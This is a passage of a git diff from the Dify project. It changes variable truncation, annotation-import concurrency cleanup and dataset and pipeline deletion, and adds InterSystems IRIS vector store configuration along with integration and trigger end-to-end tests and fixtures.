+ def _truncate_json_primitives( self, - val: UpdatedVariable | str | list[object] | dict[str, object] | bool | int | float | None, + val: UpdatedVariable | File | str | list[object] | dict[str, object] | bool | int | float | None, target_size: int, ) -> _PartResult[Any]: """Truncate a value within an object to fit within budget.""" @@ -425,6 +428,9 @@ class VariableTruncator(BaseTruncator): return self._truncate_array(val, target_size) elif isinstance(val, dict): return self._truncate_object(val, target_size) + elif isinstance(val, File): + # File objects should not be truncated, return as-is + return _PartResult(val, self.calculate_json_size(val), False) elif val is None or isinstance(val, (bool, int, float)): return _PartResult(val, self.calculate_json_size(val), False) else: diff --git a/api/tasks/annotation/batch_import_annotations_task.py b/api/tasks/annotation/batch_import_annotations_task.py index 8e46e8d0e3..775814318b 100644 --- a/api/tasks/annotation/batch_import_annotations_task.py +++ b/api/tasks/annotation/batch_import_annotations_task.py @@ -30,6 +30,8 @@ def batch_import_annotations_task(job_id: str, content_list: list[dict], app_id: logger.info(click.style(f"Start batch import annotation: {job_id}", fg="green")) start_at = time.perf_counter() indexing_cache_key = f"app_annotation_batch_import_{str(job_id)}" + active_jobs_key = f"annotation_import_active:{tenant_id}" + # get app info app = db.session.query(App).where(App.id == app_id, App.tenant_id == tenant_id, App.status == "normal").first() @@ -91,4 +93,13 @@ def batch_import_annotations_task(job_id: str, content_list: list[dict], app_id: redis_client.setex(indexing_error_msg_key, 600, str(e)) logger.exception("Build index for batch import annotations failed") finally: + # Clean up active job tracking to release concurrency slot + try: + redis_client.zrem(active_jobs_key, job_id) + logger.debug("Released concurrency slot for job: %s", job_id) + except Exception as cleanup_error: + # Log but don't 
fail if cleanup fails - the job will be auto-expired + logger.warning("Failed to clean up active job tracking for %s: %s", job_id, cleanup_error) + + # Close database session db.session.close() diff --git a/api/tasks/clean_dataset_task.py b/api/tasks/clean_dataset_task.py index 8608df6b8e..b4d82a150d 100644 --- a/api/tasks/clean_dataset_task.py +++ b/api/tasks/clean_dataset_task.py @@ -9,6 +9,7 @@ from core.rag.index_processor.index_processor_factory import IndexProcessorFacto from core.tools.utils.web_reader_tool import get_image_upload_file_ids from extensions.ext_database import db from extensions.ext_storage import storage +from models import WorkflowType from models.dataset import ( AppDatasetJoin, Dataset, @@ -18,9 +19,11 @@ from models.dataset import ( DatasetQuery, Document, DocumentSegment, + Pipeline, SegmentAttachmentBinding, ) from models.model import UploadFile +from models.workflow import Workflow logger = logging.getLogger(__name__) @@ -34,6 +37,7 @@ def clean_dataset_task( index_struct: str, collection_binding_id: str, doc_form: str, + pipeline_id: str | None = None, ): """ Clean dataset when dataset deleted. 
@@ -135,6 +139,14 @@ def clean_dataset_task( # delete dataset metadata db.session.query(DatasetMetadata).where(DatasetMetadata.dataset_id == dataset_id).delete() db.session.query(DatasetMetadataBinding).where(DatasetMetadataBinding.dataset_id == dataset_id).delete() + # delete pipeline and workflow + if pipeline_id: + db.session.query(Pipeline).where(Pipeline.id == pipeline_id).delete() + db.session.query(Workflow).where( + Workflow.tenant_id == tenant_id, + Workflow.app_id == pipeline_id, + Workflow.type == WorkflowType.RAG_PIPELINE, + ).delete() # delete files if documents: for document in documents: diff --git a/api/tasks/delete_account_task.py b/api/tasks/delete_account_task.py index fb5eb1d691..cb703cc263 100644 --- a/api/tasks/delete_account_task.py +++ b/api/tasks/delete_account_task.py @@ -2,6 +2,7 @@ import logging from celery import shared_task +from configs import dify_config from extensions.ext_database import db from models import Account from services.billing_service import BillingService @@ -14,7 +15,8 @@ logger = logging.getLogger(__name__) def delete_account_task(account_id): account = db.session.query(Account).where(Account.id == account_id).first() try: - BillingService.delete_account(account_id) + if dify_config.BILLING_ENABLED: + BillingService.delete_account(account_id) except Exception: logger.exception("Failed to delete account %s from billing service.", account_id) raise diff --git a/api/tests/integration_tests/.env.example b/api/tests/integration_tests/.env.example index e508ceef66..acc268f1d4 100644 --- a/api/tests/integration_tests/.env.example +++ b/api/tests/integration_tests/.env.example @@ -55,7 +55,7 @@ WEB_API_CORS_ALLOW_ORIGINS=http://127.0.0.1:3000,* CONSOLE_CORS_ALLOW_ORIGINS=http://127.0.0.1:3000,* # Vector database configuration -# support: weaviate, qdrant, milvus, myscale, relyt, pgvecto_rs, pgvector, pgvector, chroma, opensearch, tidb_vector, couchbase, vikingdb, upstash, lindorm, oceanbase +# support: weaviate, qdrant, 
milvus, myscale, relyt, pgvecto_rs, pgvector, pgvector, chroma, opensearch, tidb_vector, couchbase, vikingdb, upstash, lindorm, oceanbase, iris VECTOR_STORE=weaviate # Weaviate configuration WEAVIATE_ENDPOINT=http://localhost:8080 @@ -64,6 +64,20 @@ WEAVIATE_GRPC_ENABLED=false WEAVIATE_BATCH_SIZE=100 WEAVIATE_TOKENIZATION=word +# InterSystems IRIS configuration +IRIS_HOST=localhost +IRIS_SUPER_SERVER_PORT=1972 +IRIS_WEB_SERVER_PORT=52773 +IRIS_USER=_SYSTEM +IRIS_PASSWORD=Dify@1234 +IRIS_DATABASE=USER +IRIS_SCHEMA=dify +IRIS_CONNECTION_URL= +IRIS_MIN_CONNECTION=1 +IRIS_MAX_CONNECTION=3 +IRIS_TEXT_INDEX=true +IRIS_TEXT_INDEX_LANGUAGE=en + # Upload configuration UPLOAD_FILE_SIZE_LIMIT=15 diff --git a/api/tests/integration_tests/conftest.py b/api/tests/integration_tests/conftest.py index 4395a9815a..948cf8b3a0 100644 --- a/api/tests/integration_tests/conftest.py +++ b/api/tests/integration_tests/conftest.py @@ -1,3 +1,4 @@ +import os import pathlib import random import secrets @@ -32,6 +33,10 @@ def _load_env(): _load_env() +# Override storage root to tmp to avoid polluting repo during local runs +os.environ["OPENDAL_FS_ROOT"] = "/tmp/dify-storage" +os.environ.setdefault("STORAGE_TYPE", "opendal") +os.environ.setdefault("OPENDAL_SCHEME", "fs") _CACHED_APP = create_app() diff --git a/api/tests/integration_tests/vdb/iris/__init__.py b/api/tests/integration_tests/vdb/iris/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/tests/integration_tests/vdb/iris/test_iris.py b/api/tests/integration_tests/vdb/iris/test_iris.py new file mode 100644 index 0000000000..49f6857743 --- /dev/null +++ b/api/tests/integration_tests/vdb/iris/test_iris.py @@ -0,0 +1,44 @@ +"""Integration tests for IRIS vector database.""" + +from core.rag.datasource.vdb.iris.iris_vector import IrisVector, IrisVectorConfig +from tests.integration_tests.vdb.test_vector_store import ( + AbstractVectorTest, + setup_mock_redis, +) + + +class IrisVectorTest(AbstractVectorTest): + 
"""Test suite for IRIS vector store implementation.""" + + def __init__(self): + """Initialize IRIS vector test with hardcoded test configuration. + + Note: Uses 'host.docker.internal' to connect from DevContainer to + host OS Docker, or 'localhost' when running directly on host OS. + """ + super().__init__() + self.vector = IrisVector( + collection_name=self.collection_name, + config=IrisVectorConfig( + IRIS_HOST="host.docker.internal", + IRIS_SUPER_SERVER_PORT=1972, + IRIS_USER="_SYSTEM", + IRIS_PASSWORD="Dify@1234", + IRIS_DATABASE="USER", + IRIS_SCHEMA="dify", + IRIS_CONNECTION_URL=None, + IRIS_MIN_CONNECTION=1, + IRIS_MAX_CONNECTION=3, + IRIS_TEXT_INDEX=True, + IRIS_TEXT_INDEX_LANGUAGE="en", + ), + ) + + +def test_iris_vector(setup_mock_redis) -> None: + """Run all IRIS vector store tests. + + Args: + setup_mock_redis: Pytest fixture for mock Redis setup + """ + IrisVectorTest().run_all_tests() diff --git a/api/tests/test_containers_integration_tests/conftest.py b/api/tests/test_containers_integration_tests/conftest.py index 180ee1c963..d6d2d30305 100644 --- a/api/tests/test_containers_integration_tests/conftest.py +++ b/api/tests/test_containers_integration_tests/conftest.py @@ -138,9 +138,9 @@ class DifyTestContainers: logger.warning("Failed to create plugin database: %s", e) # Set up storage environment variables - os.environ["STORAGE_TYPE"] = "opendal" - os.environ["OPENDAL_SCHEME"] = "fs" - os.environ["OPENDAL_FS_ROOT"] = "storage" + os.environ.setdefault("STORAGE_TYPE", "opendal") + os.environ.setdefault("OPENDAL_SCHEME", "fs") + os.environ.setdefault("OPENDAL_FS_ROOT", "/tmp/dify-storage") # Start Redis container for caching and session management # Redis is used for storing session data, cache entries, and temporary data @@ -348,6 +348,13 @@ def _create_app_with_containers() -> Flask: """ logger.info("Creating Flask application with test container configuration...") + # Ensure Redis client reconnects to the containerized Redis (no auth) + from 
extensions import ext_redis + + ext_redis.redis_client._client = None + os.environ["REDIS_USERNAME"] = "" + os.environ["REDIS_PASSWORD"] = "" + # Re-create the config after environment variables have been set from configs import dify_config @@ -486,3 +493,29 @@ def db_session_with_containers(flask_app_with_containers) -> Generator[Session, finally: session.close() logger.debug("Database session closed") + + +@pytest.fixture(scope="package", autouse=True) +def mock_ssrf_proxy_requests(): + """ + Avoid outbound network during containerized tests by stubbing SSRF proxy helpers. + """ + + from unittest.mock import patch + + import httpx + + def _fake_request(method, url, **kwargs): + request = httpx.Request(method=method, url=url) + return httpx.Response(200, request=request, content=b"") + + with ( + patch("core.helper.ssrf_proxy.make_request", side_effect=_fake_request), + patch("core.helper.ssrf_proxy.get", side_effect=lambda url, **kw: _fake_request("GET", url, **kw)), + patch("core.helper.ssrf_proxy.post", side_effect=lambda url, **kw: _fake_request("POST", url, **kw)), + patch("core.helper.ssrf_proxy.put", side_effect=lambda url, **kw: _fake_request("PUT", url, **kw)), + patch("core.helper.ssrf_proxy.patch", side_effect=lambda url, **kw: _fake_request("PATCH", url, **kw)), + patch("core.helper.ssrf_proxy.delete", side_effect=lambda url, **kw: _fake_request("DELETE", url, **kw)), + patch("core.helper.ssrf_proxy.head", side_effect=lambda url, **kw: _fake_request("HEAD", url, **kw)), + ): + yield diff --git a/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py b/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py index ea61747ba2..d612e70910 100644 --- a/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py +++ b/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py @@ -113,16 +113,31 @@ class 
TestShardedRedisBroadcastChannelIntegration: topic = broadcast_channel.topic(topic_name) producer = topic.as_producer() subscriptions = [topic.subscribe() for _ in range(subscriber_count)] + ready_events = [threading.Event() for _ in range(subscriber_count)] def producer_thread(): - time.sleep(0.2) # Allow all subscribers to connect + deadline = time.time() + 5.0 + for ev in ready_events: + remaining = deadline - time.time() + if remaining <= 0: + break + if not ev.wait(timeout=max(0.0, remaining)): + pytest.fail("subscriber did not become ready before publish deadline") producer.publish(message) time.sleep(0.2) for sub in subscriptions: sub.close() - def consumer_thread(subscription: Subscription) -> list[bytes]: + def consumer_thread(subscription: Subscription, ready_event: threading.Event) -> list[bytes]: received_msgs = [] + # Prime subscription so the underlying Pub/Sub listener thread starts before publishing + try: + _ = subscription.receive(0.01) + except SubscriptionClosedError: + return received_msgs + finally: + ready_event.set() + while True: try: msg = subscription.receive(0.1) @@ -137,7 +152,10 @@ class TestShardedRedisBroadcastChannelIntegration: with ThreadPoolExecutor(max_workers=subscriber_count + 1) as executor: producer_future = executor.submit(producer_thread) - consumer_futures = [executor.submit(consumer_thread, subscription) for subscription in subscriptions] + consumer_futures = [ + executor.submit(consumer_thread, subscription, ready_events[idx]) + for idx, subscription in enumerate(subscriptions) + ] producer_future.result(timeout=10.0) msgs_by_consumers = [] @@ -240,8 +258,7 @@ class TestShardedRedisBroadcastChannelIntegration: for future in as_completed(producer_futures, timeout=30.0): sent_msgs.update(future.result()) - subscription.close() - consumer_received_msgs = consumer_future.result(timeout=30.0) + consumer_received_msgs = consumer_future.result(timeout=60.0) assert sent_msgs == consumer_received_msgs diff --git 
a/api/tests/test_containers_integration_tests/services/test_webhook_service.py b/api/tests/test_containers_integration_tests/services/test_webhook_service.py index 8328db950c..e3431fd382 100644 --- a/api/tests/test_containers_integration_tests/services/test_webhook_service.py +++ b/api/tests/test_containers_integration_tests/services/test_webhook_service.py @@ -233,7 +233,7 @@ class TestWebhookService: "/webhook", method="POST", headers={"Content-Type": "multipart/form-data"}, - data={"message": "test", "upload": file_storage}, + data={"message": "test", "file": file_storage}, ): webhook_trigger = MagicMock() webhook_trigger.tenant_id = "test_tenant" @@ -242,7 +242,7 @@ class TestWebhookService: assert webhook_data["method"] == "POST" assert webhook_data["body"]["message"] == "test" - assert "upload" in webhook_data["files"] + assert "file" in webhook_data["files"] # Verify file processing was called mock_external_dependencies["tool_file_manager"].assert_called_once() @@ -414,7 +414,7 @@ class TestWebhookService: "data": { "method": "post", "content_type": "multipart/form-data", - "body": [{"name": "upload", "type": "file", "required": True}], + "body": [{"name": "file", "type": "file", "required": True}], } } diff --git a/api/tests/test_containers_integration_tests/services/tools/test_api_tools_manage_service.py b/api/tests/test_containers_integration_tests/services/tools/test_api_tools_manage_service.py index 0871467a05..2ff71ea6ea 100644 --- a/api/tests/test_containers_integration_tests/services/tools/test_api_tools_manage_service.py +++ b/api/tests/test_containers_integration_tests/services/tools/test_api_tools_manage_service.py @@ -2,7 +2,9 @@ from unittest.mock import patch import pytest from faker import Faker +from pydantic import TypeAdapter, ValidationError +from core.tools.entities.tool_entities import ApiProviderSchemaType from models import Account, Tenant from models.tools import ApiToolProvider from services.tools.api_tools_manage_service import 
ApiToolManageService @@ -298,7 +300,7 @@ class TestApiToolManageService: provider_name = fake.company() icon = {"type": "emoji", "value": "🔧"} credentials = {"auth_type": "none", "api_key_header": "X-API-Key", "api_key_value": ""} - schema_type = "openapi" + schema_type = ApiProviderSchemaType.OPENAPI schema = self._create_test_openapi_schema() privacy_policy = "https://example.com/privacy" custom_disclaimer = "Custom disclaimer text" @@ -364,7 +366,7 @@ class TestApiToolManageService: provider_name = fake.company() icon = {"type": "emoji", "value": "🔧"} credentials = {"auth_type": "none"} - schema_type = "openapi" + schema_type = ApiProviderSchemaType.OPENAPI schema = self._create_test_openapi_schema() privacy_policy = "https://example.com/privacy" custom_disclaimer = "Custom disclaimer text" @@ -428,21 +430,10 @@ class TestApiToolManageService: labels = ["test"] # Act & Assert: Try to create provider with invalid schema type - with pytest.raises(ValueError) as exc_info: - ApiToolManageService.create_api_tool_provider( - user_id=account.id, - tenant_id=tenant.id, - provider_name=provider_name, - icon=icon, - credentials=credentials, - schema_type=schema_type, - schema=schema, - privacy_policy=privacy_policy, - custom_disclaimer=custom_disclaimer, - labels=labels, - ) + with pytest.raises(ValidationError) as exc_info: + TypeAdapter(ApiProviderSchemaType).validate_python(schema_type) - assert "invalid schema type" in str(exc_info.value) + assert "validation error" in str(exc_info.value) def test_create_api_tool_provider_missing_auth_type( self, flask_req_ctx_with_containers, db_session_with_containers, mock_external_service_dependencies @@ -464,7 +455,7 @@ class TestApiToolManageService: provider_name = fake.company() icon = {"type": "emoji", "value": "🔧"} credentials = {} # Missing auth_type - schema_type = "openapi" + schema_type = ApiProviderSchemaType.OPENAPI schema = self._create_test_openapi_schema() privacy_policy = "https://example.com/privacy" 
custom_disclaimer = "Custom disclaimer text" @@ -507,7 +498,7 @@ class TestApiToolManageService: provider_name = fake.company() icon = {"type": "emoji", "value": "🔑"} credentials = {"auth_type": "api_key", "api_key_header": "X-API-Key", "api_key_value": fake.uuid4()} - schema_type = "openapi" + schema_type = ApiProviderSchemaType.OPENAPI schema = self._create_test_openapi_schema() privacy_policy = "https://example.com/privacy" custom_disclaimer = "Custom disclaimer text" diff --git a/api/tests/test_containers_integration_tests/trigger/__init__.py b/api/tests/test_containers_integration_tests/trigger/__init__.py new file mode 100644 index 0000000000..8b13789179 --- /dev/null +++ b/api/tests/test_containers_integration_tests/trigger/__init__.py @@ -0,0 +1 @@ + diff --git a/api/tests/test_containers_integration_tests/trigger/conftest.py b/api/tests/test_containers_integration_tests/trigger/conftest.py new file mode 100644 index 0000000000..9c1fd5e0ec --- /dev/null +++ b/api/tests/test_containers_integration_tests/trigger/conftest.py @@ -0,0 +1,182 @@ +""" +Fixtures for trigger integration tests. + +This module provides fixtures for creating test data (tenant, account, app) +and mock objects used across trigger-related tests. +""" + +from __future__ import annotations + +from collections.abc import Generator +from typing import Any + +import pytest +from sqlalchemy.orm import Session + +from models.account import Account, Tenant, TenantAccountJoin, TenantAccountRole +from models.model import App + + +@pytest.fixture +def tenant_and_account(db_session_with_containers: Session) -> Generator[tuple[Tenant, Account], None, None]: + """ + Create a tenant and account for testing. + + This fixture creates a tenant, account, and their association, + then cleans up after the test completes. 
+ + Yields: + tuple[Tenant, Account]: The created tenant and account + """ + tenant = Tenant(name="trigger-e2e") + account = Account(name="tester", email="tester@example.com", interface_language="en-US") + db_session_with_containers.add_all([tenant, account]) + db_session_with_containers.commit() + + join = TenantAccountJoin(tenant_id=tenant.id, account_id=account.id, role=TenantAccountRole.OWNER.value) + db_session_with_containers.add(join) + db_session_with_containers.commit() + + yield tenant, account + + # Cleanup + db_session_with_containers.query(TenantAccountJoin).filter_by(tenant_id=tenant.id).delete() + db_session_with_containers.query(Account).filter_by(id=account.id).delete() + db_session_with_containers.query(Tenant).filter_by(id=tenant.id).delete() + db_session_with_containers.commit() + + +@pytest.fixture +def app_model( + db_session_with_containers: Session, tenant_and_account: tuple[Tenant, Account] +) -> Generator[App, None, None]: + """ + Create an app for testing. + + This fixture creates a workflow app associated with the tenant and account, + then cleans up after the test completes. 
+ + Yields: + App: The created app + """ + tenant, account = tenant_and_account + app = App( + tenant_id=tenant.id, + name="trigger-app", + description="trigger e2e", + mode="workflow", + icon_type="emoji", + icon="robot", + icon_background="#FFEAD5", + enable_site=True, + enable_api=True, + api_rpm=100, + api_rph=1000, + is_demo=False, + is_public=False, + is_universal=False, + created_by=account.id, + ) + db_session_with_containers.add(app) + db_session_with_containers.commit() + + yield app + + # Cleanup - delete related records first + from models.trigger import ( + AppTrigger, + TriggerSubscription, + WorkflowPluginTrigger, + WorkflowSchedulePlan, + WorkflowTriggerLog, + WorkflowWebhookTrigger, + ) + from models.workflow import Workflow + + db_session_with_containers.query(WorkflowTriggerLog).filter_by(app_id=app.id).delete() + db_session_with_containers.query(WorkflowSchedulePlan).filter_by(app_id=app.id).delete() + db_session_with_containers.query(WorkflowWebhookTrigger).filter_by(app_id=app.id).delete() + db_session_with_containers.query(WorkflowPluginTrigger).filter_by(app_id=app.id).delete() + db_session_with_containers.query(AppTrigger).filter_by(app_id=app.id).delete() + db_session_with_containers.query(TriggerSubscription).filter_by(tenant_id=tenant.id).delete() + db_session_with_containers.query(Workflow).filter_by(app_id=app.id).delete() + db_session_with_containers.query(App).filter_by(id=app.id).delete() + db_session_with_containers.commit() + + +class MockCeleryGroup: + """Mock for celery group() function that collects dispatched tasks.""" + + def __init__(self) -> None: + self.collected: list[dict[str, Any]] = [] + self._applied = False + + def __call__(self, items: Any) -> MockCeleryGroup: + self.collected = list(items) + return self + + def apply_async(self) -> None: + self._applied = True + + @property + def applied(self) -> bool: + return self._applied + + +class MockCelerySignature: + """Mock for celery task signature that returns task info 
dict.""" + + def s(self, schedule_id: str) -> dict[str, str]: + return {"schedule_id": schedule_id} + + +@pytest.fixture +def mock_celery_group() -> MockCeleryGroup: + """ + Provide a mock celery group for testing task dispatch. + + Returns: + MockCeleryGroup: Mock group that collects dispatched tasks + """ + return MockCeleryGroup() + + +@pytest.fixture +def mock_celery_signature() -> MockCelerySignature: + """ + Provide a mock celery signature for testing task dispatch. + + Returns: + MockCelerySignature: Mock signature generator + """ + return MockCelerySignature() + + +class MockPluginSubscription: + """Mock plugin subscription for testing plugin triggers.""" + + def __init__( + self, + subscription_id: str = "sub-1", + tenant_id: str = "tenant-1", + provider_id: str = "provider-1", + ) -> None: + self.id = subscription_id + self.tenant_id = tenant_id + self.provider_id = provider_id + self.credentials: dict[str, str] = {"token": "secret"} + self.credential_type = "api-key" + + def to_entity(self) -> MockPluginSubscription: + return self + + +@pytest.fixture +def mock_plugin_subscription() -> MockPluginSubscription: + """ + Provide a mock plugin subscription for testing. 
+ + Returns: + MockPluginSubscription: Mock subscription instance + """ + return MockPluginSubscription() diff --git a/api/tests/test_containers_integration_tests/trigger/test_trigger_e2e.py b/api/tests/test_containers_integration_tests/trigger/test_trigger_e2e.py new file mode 100644 index 0000000000..604d68f257 --- /dev/null +++ b/api/tests/test_containers_integration_tests/trigger/test_trigger_e2e.py @@ -0,0 +1,911 @@ +from __future__ import annotations + +import importlib +import json +import time +from datetime import timedelta +from types import SimpleNamespace +from typing import Any + +import pytest +from flask import Flask, Response +from flask.testing import FlaskClient +from sqlalchemy.orm import Session + +from configs import dify_config +from core.plugin.entities.request import TriggerInvokeEventResponse +from core.trigger.debug import event_selectors +from core.trigger.debug.event_bus import TriggerDebugEventBus +from core.trigger.debug.event_selectors import PluginTriggerDebugEventPoller, WebhookTriggerDebugEventPoller +from core.trigger.debug.events import PluginTriggerDebugEvent, build_plugin_pool_key +from core.workflow.enums import NodeType +from libs.datetime_utils import naive_utc_now +from models.account import Account, Tenant +from models.enums import AppTriggerStatus, AppTriggerType, CreatorUserRole, WorkflowTriggerStatus +from models.model import App +from models.trigger import ( + AppTrigger, + TriggerSubscription, + WorkflowPluginTrigger, + WorkflowSchedulePlan, + WorkflowTriggerLog, + WorkflowWebhookTrigger, +) +from models.workflow import Workflow +from schedule import workflow_schedule_task +from schedule.workflow_schedule_task import poll_workflow_schedules +from services import feature_service as feature_service_module +from services.trigger import webhook_service +from services.trigger.schedule_service import ScheduleService +from services.workflow_service import WorkflowService +from tasks import trigger_processing_tasks + +from 
.conftest import MockCeleryGroup, MockCelerySignature, MockPluginSubscription + +# Test constants +WEBHOOK_ID_PRODUCTION = "wh1234567890123456789012" +WEBHOOK_ID_DEBUG = "whdebug1234567890123456" +TEST_TRIGGER_URL = "https://trigger.example.com/base" + + +def _build_workflow_graph(root_node_id: str, trigger_type: NodeType) -> str: + """Build a minimal workflow graph JSON for testing.""" + node_data: dict[str, Any] = {"type": trigger_type.value, "title": "trigger"} + if trigger_type == NodeType.TRIGGER_WEBHOOK: + node_data.update( + { + "method": "POST", + "content_type": "application/json", + "headers": [], + "params": [], + "body": [], + } + ) + graph = { + "nodes": [ + {"id": root_node_id, "data": node_data}, + {"id": "answer-1", "data": {"type": NodeType.ANSWER.value, "title": "answer"}}, + ], + "edges": [{"source": root_node_id, "target": "answer-1", "sourceHandle": "success"}], + } + return json.dumps(graph) + + +def test_publish_blocks_start_and_trigger_coexistence( + db_session_with_containers: Session, + tenant_and_account: tuple[Tenant, Account], + app_model: App, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Publishing should fail when both start and trigger nodes coexist.""" + tenant, account = tenant_and_account + + graph = { + "nodes": [ + {"id": "start", "data": {"type": NodeType.START.value}}, + {"id": "trig", "data": {"type": NodeType.TRIGGER_WEBHOOK.value}}, + ], + "edges": [], + } + draft_workflow = Workflow.new( + tenant_id=tenant.id, + app_id=app_model.id, + type="workflow", + version=Workflow.VERSION_DRAFT, + graph=json.dumps(graph), + features=json.dumps({}), + created_by=account.id, + environment_variables=[], + conversation_variables=[], + rag_pipeline_variables=[], + ) + db_session_with_containers.add(draft_workflow) + db_session_with_containers.commit() + + workflow_service = WorkflowService() + + monkeypatch.setattr( + feature_service_module.FeatureService, + "get_system_features", + classmethod(lambda _cls: 
SimpleNamespace(plugin_manager=SimpleNamespace(enabled=False))), + ) + monkeypatch.setattr("services.workflow_service.dify_config", SimpleNamespace(BILLING_ENABLED=False)) + + with pytest.raises(ValueError, match="Start node and trigger nodes cannot coexist"): + workflow_service.publish_workflow(session=db_session_with_containers, app_model=app_model, account=account) + + +def test_trigger_url_uses_config_base(monkeypatch: pytest.MonkeyPatch) -> None: + """TRIGGER_URL config should be reflected in generated webhook and plugin endpoints.""" + original_url = getattr(dify_config, "TRIGGER_URL", None) + + try: + monkeypatch.setattr(dify_config, "TRIGGER_URL", TEST_TRIGGER_URL) + endpoint_module = importlib.reload(importlib.import_module("core.trigger.utils.endpoint")) + + assert ( + endpoint_module.generate_webhook_trigger_endpoint(WEBHOOK_ID_PRODUCTION) + == f"{TEST_TRIGGER_URL}/triggers/webhook/{WEBHOOK_ID_PRODUCTION}" + ) + assert ( + endpoint_module.generate_webhook_trigger_endpoint(WEBHOOK_ID_PRODUCTION, True) + == f"{TEST_TRIGGER_URL}/triggers/webhook-debug/{WEBHOOK_ID_PRODUCTION}" + ) + assert ( + endpoint_module.generate_plugin_trigger_endpoint_url("end-1") == f"{TEST_TRIGGER_URL}/triggers/plugin/end-1" + ) + finally: + # Restore original config and reload module + if original_url is not None: + monkeypatch.setattr(dify_config, "TRIGGER_URL", original_url) + importlib.reload(importlib.import_module("core.trigger.utils.endpoint")) + + +def test_webhook_trigger_creates_trigger_log( + test_client_with_containers: FlaskClient, + db_session_with_containers: Session, + tenant_and_account: tuple[Tenant, Account], + app_model: App, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Production webhook trigger should create a trigger log in the database.""" + tenant, account = tenant_and_account + + webhook_node_id = "webhook-node" + graph_json = _build_workflow_graph(webhook_node_id, NodeType.TRIGGER_WEBHOOK) + published_workflow = Workflow.new( + tenant_id=tenant.id, 
+ app_id=app_model.id, + type="workflow", + version=Workflow.version_from_datetime(naive_utc_now()), + graph=graph_json, + features=json.dumps({}), + created_by=account.id, + environment_variables=[], + conversation_variables=[], + rag_pipeline_variables=[], + ) + db_session_with_containers.add(published_workflow) + app_model.workflow_id = published_workflow.id + db_session_with_containers.commit() + + webhook_trigger = WorkflowWebhookTrigger( + app_id=app_model.id, + node_id=webhook_node_id, + tenant_id=tenant.id, + webhook_id=WEBHOOK_ID_PRODUCTION, + created_by=account.id, + ) + app_trigger = AppTrigger( + tenant_id=tenant.id, + app_id=app_model.id, + node_id=webhook_node_id, + trigger_type=AppTriggerType.TRIGGER_WEBHOOK, + status=AppTriggerStatus.ENABLED, + title="webhook", + ) + + db_session_with_containers.add_all([webhook_trigger, app_trigger]) + db_session_with_containers.commit() + + def _fake_trigger_workflow_async(session: Session, user: Any, trigger_data: Any) -> SimpleNamespace: + log = WorkflowTriggerLog( + tenant_id=trigger_data.tenant_id, + app_id=trigger_data.app_id, + workflow_id=trigger_data.workflow_id, + root_node_id=trigger_data.root_node_id, + trigger_metadata=trigger_data.trigger_metadata.model_dump_json() if trigger_data.trigger_metadata else "{}", + trigger_type=trigger_data.trigger_type, + workflow_run_id=None, + outputs=None, + trigger_data=trigger_data.model_dump_json(), + inputs=json.dumps(dict(trigger_data.inputs)), + status=WorkflowTriggerStatus.SUCCEEDED, + error="", + queue_name="triggered_workflow_dispatcher", + celery_task_id="celery-test", + created_by_role=CreatorUserRole.ACCOUNT, + created_by=account.id, + ) + session.add(log) + session.commit() + return SimpleNamespace(workflow_trigger_log_id=log.id, task_id=None, status="queued", queue="test") + + monkeypatch.setattr( + webhook_service.AsyncWorkflowService, + "trigger_workflow_async", + _fake_trigger_workflow_async, + ) + + response = 
test_client_with_containers.post(f"/triggers/webhook/{webhook_trigger.webhook_id}", json={"foo": "bar"}) + + assert response.status_code == 200 + + db_session_with_containers.expire_all() + logs = db_session_with_containers.query(WorkflowTriggerLog).filter_by(app_id=app_model.id).all() + assert logs, "Webhook trigger should create trigger log" + + +@pytest.mark.parametrize("schedule_type", ["visual", "cron"]) +def test_schedule_poll_dispatches_due_plan( + db_session_with_containers: Session, + tenant_and_account: tuple[Tenant, Account], + app_model: App, + mock_celery_group: MockCeleryGroup, + mock_celery_signature: MockCelerySignature, + monkeypatch: pytest.MonkeyPatch, + schedule_type: str, +) -> None: + """Schedule plans (both visual and cron) should be polled and dispatched when due.""" + tenant, _ = tenant_and_account + + app_trigger = AppTrigger( + tenant_id=tenant.id, + app_id=app_model.id, + node_id=f"schedule-{schedule_type}", + trigger_type=AppTriggerType.TRIGGER_SCHEDULE, + status=AppTriggerStatus.ENABLED, + title=f"schedule-{schedule_type}", + ) + plan = WorkflowSchedulePlan( + app_id=app_model.id, + node_id=f"schedule-{schedule_type}", + tenant_id=tenant.id, + cron_expression="* * * * *", + timezone="UTC", + next_run_at=naive_utc_now() - timedelta(minutes=1), + ) + db_session_with_containers.add_all([app_trigger, plan]) + db_session_with_containers.commit() + + next_time = naive_utc_now() + timedelta(hours=1) + monkeypatch.setattr(workflow_schedule_task, "calculate_next_run_at", lambda *_args, **_kwargs: next_time) + monkeypatch.setattr(workflow_schedule_task, "group", mock_celery_group) + monkeypatch.setattr(workflow_schedule_task, "run_schedule_trigger", mock_celery_signature) + + poll_workflow_schedules() + + assert mock_celery_group.collected, f"Should dispatch signatures for due {schedule_type} schedules" + scheduled_ids = {sig["schedule_id"] for sig in mock_celery_group.collected} + assert plan.id in scheduled_ids + + +def 
test_schedule_visual_debug_poll_generates_event(monkeypatch: pytest.MonkeyPatch) -> None: + """Visual mode schedule node should generate event in single-step debug.""" + base_now = naive_utc_now() + monkeypatch.setattr(event_selectors, "naive_utc_now", lambda: base_now) + monkeypatch.setattr( + event_selectors, + "calculate_next_run_at", + lambda *_args, **_kwargs: base_now - timedelta(minutes=1), + ) + node_config = { + "id": "schedule-visual", + "data": { + "type": NodeType.TRIGGER_SCHEDULE.value, + "mode": "visual", + "frequency": "daily", + "visual_config": {"time": "3:00 PM"}, + "timezone": "UTC", + }, + } + poller = event_selectors.ScheduleTriggerDebugEventPoller( + tenant_id="tenant", + user_id="user", + app_id="app", + node_config=node_config, + node_id="schedule-visual", + ) + event = poller.poll() + assert event is not None + assert event.workflow_args["inputs"] == {} + + +def test_plugin_trigger_dispatches_and_debug_events( + test_client_with_containers: FlaskClient, + mock_plugin_subscription: MockPluginSubscription, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Plugin trigger endpoint should dispatch events and generate debug events.""" + endpoint_id = "1cc7fa12-3f7b-4f6a-9c8d-1234567890ab" + + debug_events: list[dict[str, Any]] = 